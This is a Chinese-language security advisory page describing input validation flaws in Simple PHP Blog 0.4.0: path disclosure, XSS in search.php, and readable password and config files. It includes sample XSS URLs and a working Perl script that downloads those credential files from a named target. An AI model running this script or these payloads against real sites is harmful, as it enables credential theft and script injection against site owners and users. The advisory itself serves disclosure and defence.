首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
sphpblog多个输入验证漏洞
来源:http:// y3dips echo or id 作者:y3dips 发布时间:2005-04-19  

sphpblog多个输入验证漏洞

受影响系统:
Simple PHP Blog Simple PHP Blog 0.4.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13170

Simple PHP Blog是一款无需数据库支持的简单Blog程序。

sphpblog中存在多个漏洞,起因是应用程序没有正确的验证用户输入。远程攻击者可以利用这些漏洞获取敏感信息或执行任意代码。

A. 完整路径泄漏

http://[Url]/sphpblog/scripts/sb_functions.php

Ex:

Warning: main(scripts/sb_fileio.php): failed to open stream: No such file or directory in
/var/www/sphpblog/scripts/sb_functions.php on line 52

Fatal error: main(): Failed opening required 'scripts/sb_fileio.php'
(include_path='.:/usr/share/pear') in
/var/www/sphpblog/scripts/sb_functions.php on line 52

B. search.php跨站脚本漏洞

http://Url/sphpblog/search.php?q=[XSS]

http://[Url]/sphpblog/search.php?q=%3Cmarquee%3Ewe+are+a+like%3C%2Fmarquee%3E
http://[URl]/sphpblog/search.php?q=<a href=http://echo.or.id>echo</a>

C. 关键信息泄漏

攻击者可能直接访问有关blog和用户的口令和配置文件。

口令文件使用PHP的crypt()函数。

http://[Url]/sphpblog/config/password.txt
http://[Url]/sphpblog/config/config.txt

<*来源:y3dips (y3dips@echo.or.id)
Alexander Palmo (apalmo@bigevilbrain.com)

链接:http://echo.or.id/adv/adv12-y3dips-2005.txt
http://marc.theaimsgroup.com/?l=bugtraq&m=111359259108644&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl -w

# Remote grabbing sphpblog password & config file by y3dips
# Bug find by y3dips <http:// y3dips echo or id>
# Bug published at http://echo.or.id/adv/adv12-y3dips-2005.txt

print "\n* Remote grabbing sphpblog password & config file by y3dips *\n";
require LWP::UserAgent;

if(@ARGV == 1)
{

$target= $ARGV[0];

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

my @url = ("http://$target/config/password.txt", " http://$target/config/config.txt");

foreach my $urlz (@url) {
my $injek = $ua->get($urlz);
print "\n-------------------------------\n";
if ($injek->is_success)
{ print $injek->content;}
else
{die $injek->status_line;}
print "\n-------------------------------\n";

}
}
else {
print "Use: perl $0 [www.target.com] \n";
}

# EOF y3dips(c)2005
# greetz :
# @echo|staff = qw/ m0by the_day z3r0byt3 comex k-159 c-a-s-e s`to lirva32 anonymous /;
# @waraxe.us = qw/ waraxe LINUX shai-tan all_guys /;
# @echo = qw/ newbie_hacker@yahoogroups.com #e-c-h-o_@_DALnet /;

建议:
--------------------------------------------------------------------------------
厂商补丁:

Simple PHP Blog
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.simplephpblog.com/index.php


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Explorer.exe WMF Parsing DoS
·PostgreSQL 8.x PL/PgSQL Remote
·Serendipity exit.php SQL Injec
·PMSoftware Simple Web Server R
·Microsoft Windows IP Validatio
·Microsoft Exchange Server Remo
·Mozilla Suite and Firefox favi
·UBB Threads printthread.php Re
·Mozilla Firefox Sidebar Code E
·WheresJames Webcam Publisher R
·Sendmail <= 8.12.9 remote e
·Multiple Vendor TCP/IP Impleme
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved